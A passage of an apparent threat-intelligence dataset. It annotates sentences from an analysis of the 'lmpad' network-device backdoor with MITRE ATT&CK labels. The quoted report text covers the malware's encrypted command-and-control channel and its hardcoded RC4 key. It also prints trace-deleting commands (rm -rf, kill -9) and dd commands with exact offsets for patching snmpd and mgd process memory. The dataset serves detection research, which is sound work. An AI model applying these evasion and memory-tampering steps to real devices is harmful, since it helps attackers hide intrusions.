"mitre-95_mitre_report-p5-s64-131fe5", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 5, "sentence_id": 64, "context_before": "The received (and decrypted) bytes are then compared to the buffer \\x26\\xe7\\x2b\\x3a\\x1c\\xa2\\x16\\x2d\\x61\\x89\\x57\\xa9\\xcd\\x4c\\xe7\\x3c.", "sentence_text": "If the decrypted bytes are equal to this value, then the daemon continues.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573.001", "name": "Symmetric Cryptography" } ], "procedure": "Daemon verifies decrypted C2 authentication token before continuing execution", "entities": [ { "text": "If the decrypted bytes are equal to this value, then the daemon continues", "start": 0, "end": 73, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p5-s65-903466", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 5, "sentence_id": 65, "context_before": "If the decrypted bytes are equal to this value, then the daemon continues.", "sentence_text": "This seems to be another crude authentication mechanism used to authenticate the C2 to the daemon.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p5-s66-6c5897", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 5, "sentence_id": 66, "context_before": "This seems to be another crude authentication mechanism used to authenticate the C2 to the daemon.", "sentence_text": "If the received data is equal to the value seen above, the message received is encrypted and echoed back to the sender.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573.001", "name": "Symmetric Cryptography" } ], "procedure": "Encrypted C2 messages are echoed back after authentication validation.", "entities": [ { "text": " is encrypted and echoed back", "start": 75, "end": 104, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p5-s67-07b404", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 5, "sentence_id": 67, "context_before": "If the received data is equal to the value seen above, the message received is encrypted and echoed back to the sender.", "sentence_text": "Then a child is forked which performs the further processing.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p5-s68-4d5fff", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 5, "sentence_id": 68, "context_before": "Then a child is forked which performs the further processing.", "sentence_text": "The parent jumps back to the start of the controller authentication section.\nNOTE:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p5-s69-7d01b9", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 5, "sentence_id": 69, "context_before": "The parent jumps back to the start of the controller authentication section.\nNOTE:", "sentence_text": "The child process now becomes interesting.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p5-s70-8b56c4", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 5, "sentence_id": 70, "context_before": "The child process now becomes interesting.", "sentence_text": "The child process reads 4 bytes from the socket.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Reads data from socket as part of C2 communication handling.", "entities": [ { "text": "reads 4 bytes from the socket", "start": 18, "end": 47, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p5-s71-52dc5f", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 5, "sentence_id": 71, "context_before": "The child process reads 4 bytes from the socket.", "sentence_text": "These bytes are compared to the current timestamp obtained using time().", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573.001", "name": "Symmetric Cryptography" } ], "procedure": "Validates C2 message freshness by comparing message bytes to current timestamp.", "entities": [ { "text": "are compared to the current timestamp obtained", "start": 12, "end": 58, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p5-s72-d7df18", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 5, "sentence_id": 72, "context_before": "These bytes are compared to the current timestamp obtained using time().", "sentence_text": "The absolute (positive) difference between the current timestamp and these 4 bytes taken as an integer is obtained.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573.001", "name": "Symmetric Cryptography" } ], "procedure": "Performs timestamp validation on C2 data to ensure message freshness.", "entities": [ { "text": "The absolute (positive) difference between the current timestamp and these 4 bytes ", "start": 0, "end": 83, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p5-s73-0f7679", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 5, "sentence_id": 73, "context_before": "The absolute (positive) difference between the current timestamp and these 4 bytes taken as an integer is obtained.", "sentence_text": "If this difference is less than 604801, then the obtained value is echoed back to the sender using the socket.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573.001", "name": "Symmetric Cryptography" } ], "procedure": "Echoes validated C2 command back to sender after timestamp check to maintain encrypted C2 communication.", "entities": [ { "text": "the obtained value is echoed back to the sender ", "start": 45, "end": 93, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p5-s74-d1f825", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 5, "sentence_id": 74, "context_before": "If this difference is less than 604801, then the obtained value is echoed back to the sender using the socket.", "sentence_text": "Then, another 4 bytes are read from the socket.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Reads additional C2 data from the socket to continue command processing.", "entities": [ { "text": " read from the socket", "start": 25, "end": 46, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p5-s75-e27fb4", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 5, "sentence_id": 75, "context_before": "Then, another 4 bytes are read from the socket.", "sentence_text": "These 4 bytes form the command to be executed, and they are in a specific format.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p5-s76-25cc9a", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 5, "sentence_id": 76, "context_before": "These 4 bytes form the command to be executed, and they are in a specific format.", "sentence_text": "This is explained in the \"Command and Control Protocol Description\".", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p5-s77-0c83da", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 5, "sentence_id": 77, "context_before": "This is explained in the \"Command and Control Protocol Description\".", "sentence_text": "Now, the child parses these bytes and executes the respective command(s).", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "Parses C2 command bytes and executes attacker-controlled commands.", "entities": [ { "text": "parses these bytes and executes the respective command", "start": 15, "end": 69, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p5-s78-25cd0c", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 5, "sentence_id": 78, "context_before": "Now, the child parses these bytes and executes the respective command(s).", "sentence_text": "The commands are explained in detail in the \"Command Summary\" section.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p5-s79-1f9dd3", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 5, "sentence_id": 79, "context_before": "The commands are explained in detail in the \"Command Summary\" section.", "sentence_text": "The above two actions are performed in an infinite loop.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p5-s80-9ef864", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 5, "sentence_id": 80, "context_before": "The above two actions are performed in an infinite loop.", "sentence_text": "encrypt_and_send()\nThis function is used to encrypt outgoing data from the lmpad process.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573.001", "name": "Symmetric Cryptography" } ], "procedure": "Encrypts outgoing lmpad C2 data using symmetric encryption.", "entities": [ { "text": " lmpad", "start": 74, "end": 80, "label": "MalwareTool" }, { "text": " to encrypt outgoing data", "start": 40, "end": 65, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p5-s81-33cc14", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 5, "sentence_id": 81, "context_before": "encrypt_and_send()\nThis function is used to encrypt outgoing data from the lmpad process.", "sentence_text": "The RC4 cipher is used and the hardcoded key \"0b3330c0b41d1ae2\" is used for encryption.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573.001", "name": "Symmetric Cryptography" } ], "procedure": "Uses symmetric RC4 cipher with a hardcoded key to encrypt C2 traffic.", "entities": [ { "text": "used for encryption", "start": 67, "end": 86, "label": "Action" }, { "text": "The RC4 cipher", "start": 0, "end": 14, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p5-s82-d887e1", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 5, "sentence_id": 82, "context_before": "The RC4 cipher is used and the hardcoded key \"0b3330c0b41d1ae2\" is used for encryption.", "sentence_text": "receive_and_decrypt()\nThis function is used to decrypt incoming data to the lmpad process.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573.001", "name": "Symmetric Cryptography" } ], "procedure": "Decrypts incoming C2 data for processing by lmpad.", "entities": [ { "text": "is used to decrypt incoming data", "start": 36, "end": 68, "label": "Action" }, { "text": "lmpad", "start": 76, "end": 81, "label": "MalwareTool" } ] }, { "uid": "mitre-95_mitre_report-p5-s83-99cc32", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 5, "sentence_id": 83, "context_before": "receive_and_decrypt()\nThis function is used to decrypt incoming data to the lmpad process.", "sentence_text": "The RC4 cipher is used and the hardcoded key \"0b3330c0b41d1ae2\" is used for encryption.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573.001", "name": "Symmetric Cryptography" } ], "procedure": "Uses RC4 symmetric cipher with a hardcoded key to encrypt C2 communications.", "entities": [ { "text": "used for encryption", "start": 67, "end": 86, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p5-s84-d03448", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 5, "sentence_id": 84, "context_before": "The RC4 cipher is used and the hardcoded key \"0b3330c0b41d1ae2\" is used for encryption.", "sentence_text": "Command Description\nCommands are received in an encoded and encrypted format.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573.001", "name": "Symmetric Cryptography" } ], "procedure": "Receives attacker-issued C2 commands in encrypted format.", "entities": [ { "text": "received in an encoded and encrypted format.", "start": 33, "end": 77, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p5-s85-773527", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 5, "sentence_id": 85, "context_before": "Command Description\nCommands are received in an encoded and encrypted format.", "sentence_text": "A command \"packet\" is a 32-bit value with the most significant byte forming the command to be executed.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Defines the structure of a 32-bit C2 command packet, where the top byte determines the action.", "entities": [ { "text": "forming the command to be executed", "start": 68, "end": 102, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p5-s86-afb413", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 5, "sentence_id": 86, "context_before": "A command \"packet\" is a 32-bit value with the most significant byte forming the command to be executed.", "sentence_text": "The least significant 3 bytes are effectively ignored in the command execution context.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Only the top byte of the 32-bit C2 command is used for action selection; lower bytes ignored.", "entities": [ { "text": " ignored in the command execution context", "start": 45, "end": 86, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p5-s87-855f97", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 5, "sentence_id": 87, "context_before": "The least significant 3 bytes are effectively ignored in the command execution context.", "sentence_text": "This packet is then transformed to move the most significant byte to the least significant byte position.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Transforms C2 command packet by shifting the opcode byte to lowest position for decoding.", "entities": [ { "text": " transformed to move the most significant byte to the least significant byte position", "start": 19, "end": 104, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p5-s88-45d58e", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 5, "sentence_id": 88, "context_before": "This packet is then transformed to move the most significant byte to the least significant byte position.", "sentence_text": "This is done by the BSWAP instruction as follows:\n0804976e 0f c8 BSWAP pid where pid contains the command to be executed.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Uses CPU BSWAP instruction to rearrange C2 command bytes before interpretation", "entities": [ { "text": "contains the command to be executed", "start": 85, "end": 120, "label": "Action" }, { "text": " BSWAP instruction", "start": 19, "end": 37, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p5-s89-1e82bb", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 5, "sentence_id": 89, "context_before": "This is done by the BSWAP instruction as follows:\n0804976e 0f c8 BSWAP pid where pid contains the command to be executed.", "sentence_text": "For example, if the decrypted value of the packet is \"0x06000000\" the resultant command to be executed (after BSWAP is 0x00000006 or 6).", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Decodes decrypted C2 command opcode by reversing byte order to extract the command value.", "entities": [ { "text": "command to be executed", "start": 80, "end": 102, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p6-s90-67ccf3", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 6, "sentence_id": 90, "context_before": "For example, if the decrypted value of the packet is \"0x06000000\" the resultant command to be executed (after BSWAP is 0x00000006 or 6).", "sentence_text": "Command 0x0:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p6-s91-3aa4bc", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 6, "sentence_id": 91, "context_before": "Command 0x0:", "sentence_text": "Pre Access Preparation and Memory Patching Attack", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p6-s92-4939b9", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 6, "sentence_id": 92, "context_before": "Pre Access Preparation and Memory Patching Attack", "sentence_text": "The command 0x0 is used to signal to the lmpad that all access logs need to be backed up.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562.001", "name": "Disable or Modify Tools" } ], "procedure": "C2 command instructs lmpad to prepare access logs for later manipulation by backing them up.", "entities": [ { "text": "lmpad", "start": 41, "end": 46, "label": "MalwareTool" }, { "text": "need to be backed up", "start": 68, "end": 88, "label": "Action" }, { "text": " used to signal to", "start": 18, "end": 36, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p6-s93-655973", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 6, "sentence_id": 93, "context_before": "The command 0x0 is used to signal to the lmpad that all access logs need to be backed up.", "sentence_text": "This includes all traces of user login activity to the device.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562.001", "name": "Disable or Modify Tools" } ], "procedure": "Targets traces of user login activity for later manipulation to reduce forensic visibility.", "entities": [ { "text": "This includes all traces of user login activity to the device", "start": 0, "end": 61, "label": "Action" }, { "text": "device", "start": 55, "end": 61, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p6-s94-1ce847", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 6, "sentence_id": 94, "context_before": "This includes all traces of user login activity to the device.", "sentence_text": "This is most likely done to cover up malicious or unauthorized SSH access to the device using a compromised user.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562.001", "name": "Disable or Modify Tools" } ], "procedure": "Covers up traces of malicious SSH access performed using a compromised user account.", "entities": [ { "text": "to cover up malicious or unauthorized SSH access ", "start": 25, "end": 74, "label": "Action" }, { "text": " the device", "start": 76, "end": 87, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p6-s95-03324a", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 6, "sentence_id": 95, "context_before": "This is most likely done to cover up malicious or unauthorized SSH access to the device using a compromised user.", "sentence_text": "On receiving a packet with value 0x00000000, the lmpad deploys a malicious shell script at the location /var/tmp/pfed_jdhcp6_trace.log.bak.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.004", "name": "Unix Shell" } ], "procedure": "Deploys a malicious shell script to /var/tmp based on C2 command 0x00.", "entities": [ { "text": "deploys a malicious shell script at the location", "start": 55, "end": 103, "label": "Action" }, { "text": "/var/tmp/pfed_jdhcp6_trace.log.bak", "start": 104, "end": 138, "label": "Infrastructure_Indicator" }, { "text": " lmpad", "start": 48, "end": 54, "label": "MalwareTool" } ] }, { "uid": "mitre-95_mitre_report-p6-s96-590cd6", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 6, "sentence_id": 96, "context_before": "On receiving a packet with value 0x00000000, the lmpad deploys a malicious shell script at the location /var/tmp/pfed_jdhcp6_trace.log.bak.", "sentence_text": "This is done by initially writing a GZIP compressed shell script to /var/tmp/pfed_jdhcp6_trace.log and then uncompressing it to the file above.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.008", "name": "Network Device CLI" } ], "procedure": "Writing and decompressing a malicious shell script to execute on the device", "entities": [ { "text": "GZIP compressed shell script", "start": 36, "end": 64, "label": "MalwareTool" }, { "text": "writing a GZIP compressed shell script to /var/tmp/pfed_jdhcp6_trace.log and then uncompressing it", "start": 26, "end": 124, "label": "Action" }, { "text": "/var/tmp/pfed_jdhcp6_trace.log ", "start": 68, "end": 99, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p6-s97-d25023", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 6, "sentence_id": 97, "context_before": "This is done by initially writing a GZIP compressed shell script to /var/tmp/pfed_jdhcp6_trace.log and then uncompressing it to the file above.", "sentence_text": "Then the following actions are taken:\nsh /var/tmp/pfed_jdhcp6_trace.log.bak", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.008", "name": "Network Device CLI" } ], "procedure": "Executing a malicious shell script on the device.", "entities": [ { "text": "sh /var/tmp/pfed_jdhcp6_trace.log.bak", "start": 38, "end": 75, "label": "MalwareTool" }, { "text": "Then the following actions are taken:", "start": 0, "end": 37, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p6-s98-96783c", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 6, "sentence_id": 98, "context_before": "Then the following actions are taken:\nsh /var/tmp/pfed_jdhcp6_trace.log.bak", "sentence_text": "pre rm -rf /var/tmp/pfed_jdhcp6_trace.log /var/tmp/pfed_jdhcp6_trace.log.bak kill -9 $$ The contents of the /var/tmp/pfed_jdhcp6_trace.log.bak can be found in Appendix A.\nMemory Patching Attack", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.004", "name": "File Deletion" } ], "procedure": "The attacker removes malicious script files and terminates the process to eliminate forensic traces.", "entities": [ { "text": "/var/tmp/pfed_jdhcp6_trace.log.bak", "start": 108, "end": 142, "label": "Infrastructure_Indicator" }, { "text": "kill -9 $$", "start": 77, "end": 87, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p6-s99-f6060f", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 6, "sentence_id": 99, "context_before": "pre rm -rf /var/tmp/pfed_jdhcp6_trace.log /var/tmp/pfed_jdhcp6_trace.log.bak kill -9 $$ The contents of the /var/tmp/pfed_jdhcp6_trace.log.bak can be found in Appendix A.\nMemory Patching Attack", "sentence_text": "Once the pre-exploit preparation is done, the memory patching attack on snmpd and mgd is initiated.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "Initiating a memory patching attack against snmpd and mgd processes to modify their behavior in memory.", "entities": [ { "text": " snmpd and mgd", "start": 71, "end": 85, "label": "Infrastructure_Indicator" }, { "text": "the memory patching attack on snmpd and mgd is initiated", "start": 42, "end": 98, "label": "Action" }, { "text": "the pre-exploit preparation is done", "start": 5, "end": 40, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p6-s100-6df9cf", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 6, "sentence_id": 100, "context_before": "Once the pre-exploit preparation is done, the memory patching attack on snmpd and mgd is initiated.", "sentence_text": "First, the file /var/run/snmpd.pid is read to obtain the PID for snmpd.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1057", "name": "Process Discovery" } ], "procedure": "Reading the PID file to discover the running snmpd process ID for later manipulation.", "entities": [ { "text": " is read to obtain the PID for snmpd.", "start": 34, "end": 71, "label": "Action" }, { "text": "/var/run/snmpd.pid", "start": 16, "end": 34, "label": "Infrastructure_Indicator" }, { "text": "snmpd", "start": 65, "end": 70, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p6-s101-fba6f1", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 6, "sentence_id": 101, "context_before": "First, the file /var/run/snmpd.pid is read to obtain the PID for snmpd.", "sentence_text": "Then 4 bytes are read from offset 0x8601328 from /proc/${SNMPD_PID}/mem and written to /var/tmp/rts.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "Reading specific bytes from snmpd process memory for modification as part of a live process tampering attack.", "entities": [ { "text": "read from offset 0x8601328 from", "start": 17, "end": 48, "label": "Action" }, { "text": " and written to ", "start": 71, "end": 87, "label": "Action" }, { "text": "/proc/${SNMPD_PID}/mem", "start": 49, "end": 71, "label": "Infrastructure_Indicator" }, { "text": "/var/tmp/rts.", "start": 87, "end": 100, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p6-s102-4be6aa", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 6, "sentence_id": 102, "context_before": "Then 4 bytes are read from offset 0x8601328 from /proc/${SNMPD_PID}/mem and written to /var/tmp/rts.", "sentence_text": "Then the contents of /var/tmp/rts are written to /proc/${SNMPD_PID}/mem at the same offset (0x8601328).", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "Modifying live process memory by writing altered bytes back into snmpd to change its behavior while running.", "entities": [ { "text": "written to", "start": 38, "end": 48, "label": "Action" }, { "text": " /proc/${SNMPD_PID}/mem", "start": 48, "end": 71, "label": "Infrastructure_Indicator" }, { "text": "/var/tmp/rts", "start": 21, "end": 33, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p6-s103-fba18a", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 6, "sentence_id": 103, "context_before": "Then the contents of /var/tmp/rts are written to /proc/${SNMPD_PID}/mem at the same offset (0x8601328).", "sentence_text": "Then 4 bytes are read from offset 0x8601328 from /proc/${SNMPD_PID}/mem and written to /var/tmp/rts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p6-s104-3ae4f0", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 6, "sentence_id": 104, "context_before": "Then 4 bytes are read from offset 0x8601328 from /proc/${SNMPD_PID}/mem and written to /var/tmp/rts.", "sentence_text": "dd if=/proc/${SNMPD_PID}/mem of=/var/tmp/rts bs=1 count=4", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p6-s105-4b6179", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 6, "sentence_id": 105, "context_before": "dd if=/proc/${SNMPD_PID}/mem of=/var/tmp/rts bs=1 count=4", "sentence_text": "iseek=0x8601328 2>/dev/null Further, a similar attack is carried out on mgd.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "Continuing live process memory manipulation against snmpd, and extending the same memory patching technique to the mgd process.", "entities": [ { "text": "mgd.", "start": 72, "end": 76, "label": "Infrastructure_Indicator" }, { "text": "a similar attack is carried out on mgd", "start": 37, "end": 75, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p6-s106-0ee23a", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 6, "sentence_id": 106, "context_before": "iseek=0x8601328 2>/dev/null Further, a similar attack is carried out on mgd.", "sentence_text": "First, the file /var/run/mgd.pid is read to obtain the PID for mgd.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1057", "name": "Process Discovery" } ], "procedure": "Reading the mgd PID file to identify the running mgd process.", "entities": [ { "text": "read to obtain the PID for mgd.", "start": 36, "end": 67, "label": "Action" }, { "text": " /var/run/mgd.pid", "start": 15, "end": 32, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p6-s107-ac6383", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 6, "sentence_id": 107, "context_before": "First, the file /var/run/mgd.pid is read to obtain the PID for mgd.", "sentence_text": "Then 4 bytes are read from offset 0x84e90d8 from /proc/${MGD_PID}/mem and written to /var/tmp/rts.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "Reading a portion of mgd process memory for later modification.", "entities": [ { "text": " /proc/${MGD_PID}/mem", "start": 48, "end": 69, "label": "Infrastructure_Indicator" }, { "text": " /var/tmp/rts", "start": 84, "end": 97, "label": "Infrastructure_Indicator" }, { "text": "and written to", "start": 70, "end": 84, "label": "Action" }, { "text": "are read from offset", "start": 13, "end": 33, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p6-s108-d31bc5", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 6, "sentence_id": 108, "context_before": "Then 4 bytes are read from offset 0x84e90d8 from /proc/${MGD_PID}/mem and written to /var/tmp/rts.", "sentence_text": "If the data read is equal to 0x57e58955 then /var/tmp/rts is overwritten with the value 0xc3d08990.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "Modifying extracted mgd process memory bytes before writing them back.", "entities": [ { "text": "is overwritten with the value", "start": 58, "end": 87, "label": "Action" }, { "text": "he data read is equal to", "start": 4, "end": 28, "label": "Action" }, { "text": " /var/tmp/rts", "start": 44, "end": 57, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p6-s109-4b5e12", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 6, "sentence_id": 109, "context_before": "If the data read is equal to 0x57e58955 then /var/tmp/rts is overwritten with the value 0xc3d08990.", "sentence_text": "The contents of /var/tmp/rts are then written to /proc/${MGD_PID}/mem at offset 0x84e90d8.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "Writing modified memory bytes back into the running mgd process", "entities": [ { "text": "/var/tmp/rts", "start": 16, "end": 28, "label": "Action" }, { "text": "/proc/${MGD_PID}/mem", "start": 49, "end": 69, "label": "Infrastructure_Indicator" }, { "text": "then written to", "start": 33, "end": 48, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p6-s110-646729", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 6, "sentence_id": 110, "context_before": "The contents of /var/tmp/rts are then written to /proc/${MGD_PID}/mem at offset 0x84e90d8.", "sentence_text": "Then 4 bytes from /proc/${MGD_PID}/mem are read at offset 0x85f6f80, and the contents are written to /var/tmp/rts.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "Reading memory from the running mgd process to support in-memory modification.", "entities": [ { "text": "are read at offset ", "start": 39, "end": 58, "label": "Action" }, { "text": "and the contents are written to", "start": 69, "end": 100, "label": "Action" }, { "text": "/proc/${MGD_PID}/mem", "start": 18, "end": 38, "label": "Infrastructure_Indicator" }, { "text": " /var/tmp/rts", "start": 100, "end": 113, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p6-s111-af7f43", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 6, "sentence_id": 111, "context_before": "Then 4 bytes from /proc/${MGD_PID}/mem are read at offset 0x85f6f80, and the contents are written to /var/tmp/rts.", "sentence_text": "This is then replaced with 0.\n6.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "Replacing extracted memory data with zero to alter the behavior of the running mgd process.", "entities": [ { "text": " replaced with 0.", "start": 12, "end": 29, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p6-s112-01afaf", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 6, "sentence_id": 112, "context_before": "This is then replaced with 